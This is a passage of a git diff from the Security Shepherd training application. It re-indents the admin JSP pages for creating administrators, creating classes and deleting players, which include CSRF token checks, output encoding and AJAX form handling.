-                    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "createNewAdmin.jsp error");
-                    response.sendRedirect("error.jsp");
-                }
-            }
+if(ses.getAttribute("errorMessage") != null)
+{
+	try
+	{
+	errorMessage = Encode.forHtml(ses.getAttribute("errorMessage").toString());
+	newUserName = Encode.forHtmlAttribute(ses.getAttribute("userName").toString());
+	userAddress = Encode.forHtmlAttribute(ses.getAttribute("userAddress").toString());
+	ses.removeAttribute("userName");
+	ses.removeAttribute("userAddress");
+	ses.removeAttribute("errorMessage");
+	}
+	catch(Exception e)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "createNewAdmin.jsp error");
+		response.sendRedirect("error.jsp");
+	}
+}
 %>
 <div id="formDiv" class="post">
-    <h1 class="title">Create New Admin</h1>
-    <div id="createUserDiv" class="entry">
-        <form id="theForm" action="javascript:;">
-            <p>Please input what data you want the new administrator to have.
-                Please note that the password will be temporary.</p>
-            <input type="hidden" id="csrfToken" value="<%= csrfToken %>"/>
-            <table align="center">
-                <tr>
-                    <td><p>
-                        Username<font color="red"><small>* </small></font> :
-                    </p></td>
-                    <td><input type="text" id="userName"
-                               value="<%= newUserName %>"/></td>
-                </tr>
-                <tr>
-                    <td><p>
-                        Password<font color="red"><small>* </small></font> :
-                    </p></td>
-                    <td><input type="password" id="passWord"/></td>
-                </tr>
-                <tr>
-                    <td><p>
-                        Confirm Password<font color="red"><small>* </small></font> :
-                    </p></td>
-                    <td><input type="password" id="passWordConfirm"/></td>
-                </tr>
-                <tr>
-                    <td><p>Email Address:</p></td>
-                    <td><input type="text" id="userAddress"
-                               value="<%= userAddress %>"/></td>
-                </tr>
-                <tr>
-                    <td><p>Confirm Address:</p></td>
-                    <td><input type="text" id="userAddressCnf"/></td>
-                </tr>
-                <tr>
-                    <td colspan="2" align="center"><input type="submit"
-                                                          id="submitButton" value="Create New Admin"/></td>
-                </tr>
-            </table>
-        </form>
-    </div>
-    <br>
-    <div id="loadingDiv" style="display: none;" class="menuButton">Loading...</div>
-    <div id="resultDiv" style="display: none;" class="informationBox"></div>
-    <div id="badData"></div>
+	<h1 class="title">Create New Admin</h1>
+	<div id="createUserDiv" class="entry">
+		<form id="theForm" action="javascript:;">
+			<p>Please input what data you want the new administrator to have.
+				Please note that the password will be temporary.</p>
+			<input type="hidden" id="csrfToken" value="<%= csrfToken %>" />
+			<table align="center">
+				<tr>
+					<td><p>
+							Username<font color="red"><small>* </small></font> :
+						</p></td>
+					<td><input type="text" id="userName"
+						value="<%= newUserName %>" /></td>
+				</tr>
+				<tr>
+					<td><p>
+							Password<font color="red"><small>* </small></font> :
+						</p></td>
+					<td><input type="password" id="passWord" /></td>
+				</tr>
+				<tr>
+					<td><p>
+							Confirm Password<font color="red"><small>* </small></font> :
+						</p></td>
+					<td><input type="password" id="passWordConfirm" /></td>
+				</tr>
+				<tr>
+					<td><p>Email Address:</p></td>
+					<td><input type="text" id="userAddress"
+						value="<%= userAddress %>" /></td>
+				</tr>
+				<tr>
+					<td><p>Confirm Address:</p></td>
+					<td><input type="text" id="userAddressCnf" /></td>
+				</tr>
+				<tr>
+					<td colspan="2" align="center"><input type="submit"
+						id="submitButton" value="Create New Admin" /></td>
+				</tr>
+			</table>
+		</form>
+	</div>
+	<br>
+	<div id="loadingDiv" style="display: none;" class="menuButton">Loading...</div>
+	<div id="resultDiv" style="display: none;" class="informationBox"></div>
+	<div id="badData"></div>
 </div>
 <script>
-    $("#theForm").submit(function () {
-        //Get data
-        var theUserName = $("#userName").attr('value');
-        var thePassWord = $('#passWord').attr('value');
-        var thePassWordConfirm = $('#passWordConfirm').attr('value');
-        var theUserAddress = $('#userAddress').attr('value');
-        var theUserAddressCnf = $('#userAddressCnf').attr('value');
-        var theCsrfToken = $('#csrfToken').attr('value');
-        //Validation
-        if (theUserName.length == 0 ||
-            thePassWord.length == 0 ||
-            thePassWordConfirm.length == 0) {
-            $('#badData').html("<p><strong><font color='red'>All required fields must be populated </font></strong></p>");
-        } else if (theUserName.length < 5 || theUserName.lenght > 32) {
-            $('#userName').val("");
-            $('#userName').css("background", "#E42217");
-            $('#badData').html("<p><strong><font color='red'>Invalid Username. Please try Again.</font></strong></p>");
-        } else if (thePassWord.lenght < 5 || thePassWord.lenght > 512) {
-            $('#passWord').val("");
-            $('#passWordConfirm').val("");
-            $('#passWord').css("background", "#E42217");
-            $('#badData').html("<p><strong><font color='red'>Invalid password. Please try Again.</font></strong></p>");
-        } else if (thePassWord != thePassWordConfirm) {
-            $('#passWord').val("");
-            $('#passWordConfirm').val("");
-            $('#passWord').css("background", "#E42217");
-            $('#passWordConfirm').css("background", "#E42217");
-            $('#badData').html("<p><strong><font color='red'>Password fields did not match. Please try Again.</font></strong></p>");
-        } else {
-            $("#loadingDiv").show("fast");
-            $("#badData").hide("fast");
-            $("#resultDiv").hide("fast");
-            $("#createUserDiv").slideUp("fast", function () {
-                //The Ajax Operation
-                var ajaxCall = $.ajax({
-                    type: "POST",
-                    url: "createNewAdmin",
-                    data: {
-                        userName: theUserName,
-                        passWord: thePassWord,
-                        passWordConfirm: thePassWordConfirm,
-                        userAddress: theUserAddress,
-                        userAddressCnf: theUserAddressCnf,
-                        csrfToken: theCsrfToken
-                    },
-                    async: false
-                });
-                $("#loadingDiv").hide("fast", function () {
-                    if (ajaxCall.status == 200) {
-                        //Reset Form
-                        $("#userName").val('');
-                        $('#passWord').val('');
-                        $('#passWordConfirm').val('');
-                        $('#userAddress').val('');
-                        $('#userAddressCnf').val('');
-                        //Now output Result Div and Show
-                        $("#resultDiv").html(ajaxCall.responseText);
-                        $("#resultDiv").show("fast");
-                    } else {
-                        $("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
-                        $("#badData").show("slow");
-                    }
-                    $("#createUserDiv").slideDown("slow");
-                });
-            });
-        }
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	$("#theForm").submit(function(){
+		//Get data
+		var theUserName = $("#userName").attr('value');
+		var thePassWord = $('#passWord').attr('value');
+		var thePassWordConfirm = $('#passWordConfirm').attr('value');
+		var theUserAddress = $('#userAddress').attr('value');
+		var theUserAddressCnf = $('#userAddressCnf').attr('value');
+		var theCsrfToken = $('#csrfToken').attr('value');
+		//Validation
+		if (theUserName.length == 0 ||
+			thePassWord.length == 0 ||
+			thePassWordConfirm.length == 0)
+		{
+			$('#badData').html("<p><strong><font color='red'>All required fields must be populated </font></strong></p>");
+		}
+		else if(theUserName.length < 5 || theUserName.lenght > 32)
+		{
+			$('#userName').val("");
+			$('#userName').css("background", "#E42217");
+			$('#badData').html("<p><strong><font color='red'>Invalid Username. Please try Again.</font></strong></p>");
+		}
+		else if(thePassWord.lenght < 5 || thePassWord.lenght > 512 )
+		{
+			$('#passWord').val("");
+			$('#passWordConfirm').val("");
+			$('#passWord').css("background", "#E42217");
+			$('#badData').html("<p><strong><font color='red'>Invalid password. Please try Again.</font></strong></p>");
+		}
+		else if(thePassWord != thePassWordConfirm)
+		{
+			$('#passWord').val("");
+			$('#passWordConfirm').val("");
+			$('#passWord').css("background", "#E42217");
+			$('#passWordConfirm').css("background", "#E42217");
+			$('#badData').html("<p><strong><font color='red'>Password fields did not match. Please try Again.</font></strong></p>");
+		}
+		else
+		{
+			$("#loadingDiv").show("fast");
+			$("#badData").hide("fast");
+			$("#resultDiv").hide("fast");
+			$("#createUserDiv").slideUp("fast", function(){
+				//The Ajax Operation
+				var ajaxCall = $.ajax({
+					type: "POST",
+					url: "createNewAdmin",
+					data: {
+						userName: theUserName, 
+						passWord: thePassWord, 
+						passWordConfirm: thePassWordConfirm,
+						userAddress: theUserAddress,
+						userAddressCnf: theUserAddressCnf,
+						csrfToken: theCsrfToken
+					},
+					async: false
+				});
+				$("#loadingDiv").hide("fast", function(){
+					if(ajaxCall.status == 200)
+					{
+						//Reset Form
+						$("#userName").val('');
+						$('#passWord').val('');
+						$('#passWordConfirm').val('');
+						$('#userAddress').val('');
+						$('#userAddressCnf').val('');
+						//Now output Result Div and Show
+						$("#resultDiv").html(ajaxCall.responseText);
+						$("#resultDiv").show("fast");
+					}
+					else
+					{
+						$("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
+						$("#badData").show("slow");
+					}
+					$("#createUserDiv").slideDown("slow");
+				});
+			});
+		}
+	});
+	</script>
+<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
 <% } %>
 <%
-        } else {
-            response.sendRedirect("../../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../../loggedOutSheep.html");
-    }
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/admin/userManagement/createNewClass.jsp b/src/main/webapp/admin/userManagement/createNewClass.jsp
index fe14cb6ce..50a97d573 100644
--- a/src/main/webapp/admin/userManagement/createNewClass.jsp
+++ b/src/main/webapp/admin/userManagement/createNewClass.jsp
@@ -1,140 +1,159 @@
 <%@ page contentType="text/html; charset=iso-8859-1" language="java"
-         import="java.sql.*, java.util.Calendar, java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
+	import="java.sql.*, java.util.Calendar, java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
 
 <%
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: createNewClass.jsp *************************");
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: createNewClass.jsp *************************");
 
 /**
  * This file is part of the Security Shepherd Project.
- *
+ * 
  * The Security Shepherd project is free software: you can redistribute it and/or modify
  * it under the terms of the GNU General Public License as published by
  * the Free Software Foundation, either version 3 of the License, or
  * (at your option) any later version.<br/>
- *
+ * 
  * The Security Shepherd project is distributed in the hope that it will be useful,
  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  * GNU General Public License for more details.<br/>
- *
+ * 
  * You should have received a copy of the GNU General Public License
  * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
- *
+ * 
  * @author Mark Denihan
  */
-
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        Getter get = new Getter();
+ 
+if (request.getSession() != null)
+{
+HttpSession ses = request.getSession();
+Getter get = new Getter();
 //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(createNewClass.jsp): tokenCookie Error:" + htmlE.toString());
-        }
+Cookie tokenCookie = null;
+try
+{
+	tokenCookie = Validate.getToken(request.getCookies());
+}
+catch(Exception htmlE)
+{
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(createNewClass.jsp): tokenCookie Error:" + htmlE.toString());
+}
 // validateAdminSession ensures a valid session, and valid administrator credentials
 // Also, if tokenCookie != null, then the page is good to continue loading
 // Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
-        Object tokenParmeter = request.getParameter("csrfToken");
-        if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
-            //Logging Username
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+Object tokenParmeter = request.getParameter("csrfToken");
+if(Validate.validateAdminSession(ses, tokenCookie, tokenParmeter))
+{
+	//Logging Username
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 // Getting Session Variables
 //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
 
-            String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
-            String userName = Encode.forHtml(ses.getAttribute("userName").toString());
-            String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
-            String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
-            String ApplicationRoot = getServletContext().getRealPath("");
+String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
+String userName = Encode.forHtml(ses.getAttribute("userName").toString());
+String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
+String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
+String ApplicationRoot = getServletContext().getRealPath("");
 %>
 <div id="formDiv" class="post">
-    <h1 class="title">Create New Class</h1>
-    <div id="createClassDiv" class="entry">
-        <form id="theForm" action="javascript:;">
-            <p>Please input the data you would like the new class to have.
-                The class year format should be YYYY, such as 2010.</p>
-            <input type="hidden" id="csrfToken" value="<%= csrfToken %>"/>
-            <table align="center">
-                <tr>
-                    <td><p>Class Name:</p></td>
-                    <td><input type="text" id="className" value=""/></td>
-                </tr>
-                <tr>
-                    <td><p>Class Year:</p></td>
-                    <td><input type="text" id="classYear"
-                               value="<%= Calendar.getInstance().get(Calendar.YEAR) %>"/></td>
-                </tr>
-                <tr>
-                    <td colspan="2" align="center"><input type="submit"
-                                                          id="submitButton" value="Create New Class"/></td>
-                </tr>
-            </table>
-        </form>
-    </div>
-    <br>
-    <div id="loadingDiv" style="display: none;" class="menuButton">Loading...</div>
-    <div id="resultDiv" style="display: none;" class="informationBox"></div>
-    <div id="badData"></div>
+	<h1 class="title">Create New Class</h1>
+	<div id="createClassDiv" class="entry">
+		<form id="theForm" action="javascript:;">
+			<p>Please input the data you would like the new class to have.
+				The class year format should be YYYY, such as 2010.</p>
+			<input type="hidden" id="csrfToken" value="<%= csrfToken %>" />
+			<table align="center">
+				<tr>
+					<td><p>Class Name:</p></td>
+					<td><input type="text" id="className" value="" /></td>
+				</tr>
+				<tr>
+					<td><p>Class Year:</p></td>
+					<td><input type="text" id="classYear"
+						value="<%= Calendar.getInstance().get(Calendar.YEAR) %>" /></td>
+				</tr>
+				<tr>
+					<td colspan="2" align="center"><input type="submit"
+						id="submitButton" value="Create New Class" /></td>
+				</tr>
+			</table>
+		</form>
+	</div>
+	<br>
+	<div id="loadingDiv" style="display: none;" class="menuButton">Loading...</div>
+	<div id="resultDiv" style="display: none;" class="informationBox"></div>
+	<div id="badData"></div>
 </div>
 <script>
-    $("#theForm").submit(function () {
-        //Get Data
-        var theClassName = $("#className").attr('value');
-        var theClassYear = $('#classYear').attr('value');
-        var theCsrfToken = $('#csrfToken').attr('value');
-        //Validation
-        if (theClassName.length == 0 || theClassYear.length == 0) {
-            $('#badData').html("<p><strong><font color='red'>All fields are required</font></strong></p>");
-        } else if (theClassName.length < 5 || theClassName.lenght > 32) {
-            $('#className').val("");
-            $('#className').css("background", "#E42217");
-            $('#badData').html("<p><strong><font color='red'>Invalid Class Name. Please try Again.</font></strong></p>");
-        } else if (theClassYear.length != 4) {
-            $('#classYear').val("");
-            $('#classYear').css("background", "#E42217");
-            $('#badData').html("<p><strong><font color='red'>Invalid class year. Please try again with the YYYY format (eg: 2010)</font></strong></p>");
-        } else {
-            //Hide&Show Stuff
-            $("#loadingDiv").show("fast");
-            $("#badData").hide("fast");
-            $("#resultDiv").hide("fast");
-            $("#createClassDiv").slideUp("fast", function () {
-                //The Ajax Operation
-                var ajaxCall = $.ajax({
-                    type: "POST",
-                    url: "createNewClass",
-                    data: {
-                        className: theClassName,
-                        classYear: theClassYear,
-                        csrfToken: theCsrfToken
-                    },
-                    async: false
-                });
-                $("#loadingDiv").hide("fast", function () {
-                    if (ajaxCall.status == 200) {
-                        //Now output Result Div and Show
-                        $("#resultDiv").html(ajaxCall.responseText);
-                        $("#resultDiv").show("fast");
-                    } else {
-                        $("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
-                        $("#badData").show("slow");
-                    }
-                    $("#createClassDiv").slideDown("slow");
-                });
-            });
-        }
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	$("#theForm").submit(function(){
+		//Get Data
+		var theClassName = $("#className").attr('value');
+		var theClassYear = $('#classYear').attr('value');
+		var theCsrfToken = $('#csrfToken').attr('value');
+		//Validation
+		if (theClassName.length == 0 || theClassYear.length == 0)
+		{
+			$('#badData').html("<p><strong><font color='red'>All fields are required</font></strong></p>");
+		}
+		else if(theClassName.length < 5 || theClassName.lenght > 32)
+		{
+			$('#className').val("");
+			$('#className').css("background", "#E42217");
+			$('#badData').html("<p><strong><font color='red'>Invalid Class Name. Please try Again.</font></strong></p>");
+		}
+		else if(theClassYear.length != 4)
+		{
+			$('#classYear').val("");
+			$('#classYear').css("background", "#E42217");
+			$('#badData').html("<p><strong><font color='red'>Invalid class year. Please try again with the YYYY format (eg: 2010)</font></strong></p>");
+		}
+		else
+		{
+			//Hide&Show Stuff
+			$("#loadingDiv").show("fast");
+			$("#badData").hide("fast");
+			$("#resultDiv").hide("fast");
+			$("#createClassDiv").slideUp("fast", function(){
+				//The Ajax Operation
+				var ajaxCall = $.ajax({
+					type: "POST",
+					url: "createNewClass",
+					data: {
+						className: theClassName, 
+						classYear: theClassYear, 
+						csrfToken: theCsrfToken
+					},
+					async: false
+				});
+				$("#loadingDiv").hide("fast", function(){
+					if(ajaxCall.status == 200)
+					{
+						//Now output Result Div and Show
+						$("#resultDiv").html(ajaxCall.responseText);
+						$("#resultDiv").show("fast");
+					}
+					else
+					{
+						$("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
+						$("#badData").show("slow");
+					}
+					$("#createClassDiv").slideDown("slow");
+				});
+			});
+		}
+	});
+	</script>
+<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
 <% } %>
 <%
-        } else {
-            response.sendRedirect("../../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../../loggedOutSheep.html");
-    }
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/admin/userManagement/deletePlayers.jsp b/src/main/webapp/admin/userManagement/deletePlayers.jsp
index d53d7d9af..eaf5c17e9 100644
--- a/src/main/webapp/admin/userManagement/deletePlayers.jsp
+++ b/src/main/webapp/admin/userManagement/deletePlayers.jsp
@@ -1,213 +1,242 @@
 <%@ page contentType="text/html; charset=iso-8859-1" language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*, servlets.admin.userManagement.GetPlayersByClass"
-         errorPage="" %>
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*, servlets.admin.userManagement.GetPlayersByClass"
+	errorPage=""%>
 
 <%
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: addPlayers.jsp *************************");
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: addPlayers.jsp *************************");
 
 /**
  * This file is part of the Security Shepherd Project.
- *
+ * 
  * The Security Shepherd project is free software: you can redistribute it and/or modify
  * it under the terms of the GNU General Public License as published by
  * the Free Software Foundation, either version 3 of the License, or
  * (at your option) any later version.<br/>
- *
+ * 
  * The Security Shepherd project is distributed in the hope that it will be useful,
  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  * GNU General Public License for more details.<br/>
- *
+ * 
  * You should have received a copy of the GNU General Public License
  * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
- *
+ * 
  * @author Cosmin Craciun
  */
-
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        Getter get = new Getter();
+ 
+if (request.getSession() != null)
+{
+HttpSession ses = request.getSession();
+Getter get = new Getter();
 //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(deletePlayers.jsp): tokenCookie Error:" + htmlE.toString());
-        }
+Cookie tokenCookie = null;
+try
+{
+	tokenCookie = Validate.getToken(request.getCookies());
+}
+catch(Exception htmlE)
+{
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(deletePlayers.jsp): tokenCookie Error:" + htmlE.toString());
+}
 // validateAdminSession ensures a valid session, and valid administrator credentials
 // Also, if tokenCookie != null, then the page is good to continue loading
 // Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
-        Object tokenParmeter = request.getParameter("csrfToken");
-        if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
-            //Logging Username
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+Object tokenParmeter = request.getParameter("csrfToken");
+if(Validate.validateAdminSession(ses, tokenCookie, tokenParmeter))
+{
+	//Logging Username
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 // Getting Session Variables
 //This encoder should escape all output to prevent XSS attacks. This should be performed everywhere for safety
-            String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
-            String userName = Encode.forHtml(ses.getAttribute("userName").toString());
-            String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
-            String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
-            String ApplicationRoot = getServletContext().getRealPath("");
-
-            boolean showClasses = false;
-
-            ResultSet classList = Getter.getClassInfo(ApplicationRoot);
-            try {
-                showClasses = classList.next();
-            } catch (SQLException e) {
-                ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Could not open classList: " + e.toString());
-                showClasses = false;
-            }
+String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
+String userName = Encode.forHtml(ses.getAttribute("userName").toString());
+String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
+String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
+String ApplicationRoot = getServletContext().getRealPath("");
+
+boolean showClasses = false;
+
+ResultSet classList = Getter.getClassInfo(ApplicationRoot);
+try
+{
+	showClasses = classList.next();
+}
+catch(SQLException e)
+{
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Could not open classList: " + e.toString());
+	showClasses = false;
+}
 %>
 <div id="formDiv" class="post">
-    <h1 class="title">Delete Player</h1>
-    <div class="entry">
-        <form id="theForm" action="javascript:;">
-            <p>Use this function to delete players</p>
-            <input type="hidden" id="csrfToken" value="<%=csrfToken%>"/>
-            <div id="deletePlayerDiv">
-                <table align="center">
-                    <tr>
-                        <td colspan="2">
-                            <p>Pick the class of the player you wish to delete</p>
-                            <center>
-                                <select id="selectClass" style="width: 300px;">
-                                    <option value="">Unassigned Players</option>
-                                    <%
-                                        if (showClasses) {
-                                            try {
-                                                do {
-                                                    String classId = Encode.forHtmlAttribute(classList.getString(1));
-                                                    String classYearName = Encode.forHtml(classList.getString(3)) + " " + Encode.forHtml(classList.getString(2));
-                                    %>
-                                    <option value="<%=classId%>"><%=classYearName%>
-                                    </option>
-                                    <%
-                                                }
-                                                while (classList.next());
-                                                classList.first();
-                                            } catch (SQLException e) {
-                                                ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Error occured when manipulating classList: " + e.toString());
-                                                showClasses = false;
-                                            }
-                                        }
-                                    %>
-                                </select>
-                            </center>
-                        </td>
-                    </tr>
-                    <tr>
-                        <td colspan="2">
-                            <p>Select the player that you want to delete</p>
-                            <div id="playerSelect">
-                                <center>
-                                    <select id='playerId' style='width: 300px;'>
-                                        <%= GetPlayersByClass.playersInOptionTags(Getter.getPlayersByClass(ApplicationRoot, null)) %>
-                                    </select>
-                                </center>
-                            </div>
-                            <br>
-                        </td>
-                    </tr>
-                    <tr>
-                        <td colspan="2" align="center"><input type="submit"
-                                                              id="submitButton" value="Delete Player"/></td>
-                    </tr>
-                </table>
-            </div>
-        </form>
-    </div>
-    <br>
-    <div id="loadingDiv" style="display: none;" class="menuButton">Loading...</div>
-    <div id="resultDiv" style="display: none;" class="informationBox"></div>
-    <div id="badData"></div>
+	<h1 class="title">Delete Player</h1>
+	<div class="entry">
+		<form id="theForm" action="javascript:;">
+			<p>Use this function to delete players</p>
+			<input type="hidden" id="csrfToken" value="<%=csrfToken%>" />
+			<div id="deletePlayerDiv">
+				<table align="center">
+					<tr>
+						<td colspan="2">
+							<p>Pick the class of the player you wish to delete</p>
+							<center>
+								<select id="selectClass" style="width: 300px;">
+									<option value="">Unassigned Players</option>
+									<%
+										if(showClasses)
+										{
+											try
+											{
+												do
+												{
+													String classId = Encode.forHtmlAttribute(classList.getString(1));
+													String classYearName = Encode.forHtml(classList.getString(3)) + " " + Encode.forHtml(classList.getString(2));
+													%>
+									<option value="<%=classId%>"><%=classYearName%></option>
+									<%
+												}
+												while(classList.next());
+												classList.first();
+											}
+											catch(SQLException e)
+											{
+												ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Error occured when manipulating classList: " + e.toString());
+												showClasses = false;
+											}
+										}
+									%>
+								</select>
+							</center>
+						</td>
+					</tr>
+					<tr>
+						<td colspan="2">
+							<p>Select the player that you want to delete</p>
+							<div id="playerSelect">
+								<center>
+									<select id='playerId' style='width: 300px;'>
+										<%= GetPlayersByClass.playersInOptionTags(Getter.getPlayersByClass(ApplicationRoot, null)) %>
+									</select>
+								</center>
+							</div> <br>
+						</td>
+					</tr>
+					<tr>
+						<td colspan="2" align="center"><input type="submit"
+							id="submitButton" value="Delete Player" /></td>
+					</tr>
+				</table>
+			</div>
+		</form>
+	</div>
+	<br>
+	<div id="loadingDiv" style="display: none;" class="menuButton">Loading...</div>
+	<div id="resultDiv" style="display: none;" class="informationBox"></div>
+	<div id="badData"></div>
 </div>
 
 <script>
-    $("#selectClass").change(function () {
-        var theCsrfToken = $('#csrfToken').val();
-        var ajaxCall = $.ajax({
-            type: "POST",
-            url: "getPlayersByClass",
-            data: {
-                classId: $("#selectClass option:selected").val(),
-                csrfToken: theCsrfToken
-            },
-            async: false
-        });
-        if (ajaxCall.status == 200) {
-            $("#playerSelect").hide("fast", function () {
-                if (ajaxCall.responseText == '') {
-                    $("#playerSelect").html("<p><font color='red'>Sorry, but there are no players in this class</font></p>");
-                } else if (ajaxCall.responseText == 'fail') {
-                    $("#playerSelect").html("<p><font color='red'>Sorry, but an error occured! Please try again!</font></p>");
-                } else {
-                    $("#playerSelect").html("<center><select id='playerId' style='width: 300px'>" + ajaxCall.responseText + "</select><br></center>");
-                }
-                $("#playerSelect").show("slow");
-            });
-        } else {
-            $("#badData").html("<p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-        }
-    });
-
-    $("#theForm").submit(function () {
-        //Get Data
-        var theCsrfToken = $('#csrfToken').val();
-        var thePlayers = $("#playerId").val();
-        //Validation
-        if (thePlayers == null) {
-            $('#badData').html("<p><strong><font color='red'>Please select a player to delete.</font></strong></p>");
-        } else {
-            //Hide&Show Stuff
-            $("#loadingDiv").show("fast");
-            $("#badData").hide("fast");
-            $("#resultDiv").hide("fast");
-            $("#deletePlayerDiv").slideUp("fast", function () {
-                //The Ajax Operation
-                var ajaxCall = $.ajax({
-                    type: "POST",
-                    url: "deletePlayers",
-                    data: {
-                        player: thePlayers,
-                        csrfToken: theCsrfToken
-                    },
-                    async: false
-                });
-                $("#loadingDiv").hide("fast", function () {
-                    if (ajaxCall.status == 200) {
-                        //Now output Result Div and Show
-                        $("#resultDiv").html(ajaxCall.responseText);
-                        $("#resultDiv").show("fast");
-
-                        var success_mark = "successfully";
-
-                        if (ajaxCall.responseText.indexOf(success_mark) > 0) {
-                            if ($("#playerId").length == 1) {
-                                var userSelect = $("#playerId")[0];
-                                userSelect.remove(userSelect.selectedIndex);
-                            }
-                        }
-                    } else {
-                        $("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
-                        $("#badData").show("slow");
-                    }
-                    $("#deletePlayerDiv").slideDown("slow");
-                });
-            });
-        }
-    });
-</script>
-
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+		$("#selectClass").change(function () {
+			var theCsrfToken = $('#csrfToken').val();
+			var ajaxCall = $.ajax({
+				type: "POST",
+				url: "getPlayersByClass",
+				data: {
+					classId: $("#selectClass option:selected").val(),
+					csrfToken: theCsrfToken
+				},
+				async: false
+			});
+			if(ajaxCall.status == 200)
+			{
+				$("#playerSelect").hide("fast", function(){
+					if(ajaxCall.responseText == '')
+					{
+						$("#playerSelect").html("<p><font color='red'>Sorry, but there are no players in this class</font></p>");
+					}
+					else if(ajaxCall.responseText == 'fail')
+					{
